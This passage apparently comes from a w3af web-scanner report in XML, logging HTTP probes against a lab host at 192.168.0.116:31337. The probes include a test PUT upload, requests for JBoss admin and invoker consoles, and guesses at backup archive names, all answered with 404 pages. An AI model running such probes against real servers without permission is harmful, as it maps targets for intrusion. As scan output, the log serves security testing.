&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="196">
                <httprequest>
                    <status>PUT http://192.168.0.116:31337/huaJs HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">T0IwuI</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="201">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="202">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="203">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="204">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="206">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="207">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="210">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.cab HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="211">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.cab HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="212">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="213">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.tgz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="214">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.7z HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="215">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="216">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.rar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="217">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.tgz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="218">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.gzip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="220">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="221">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.gzip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="222">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="223">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="224">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.zip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
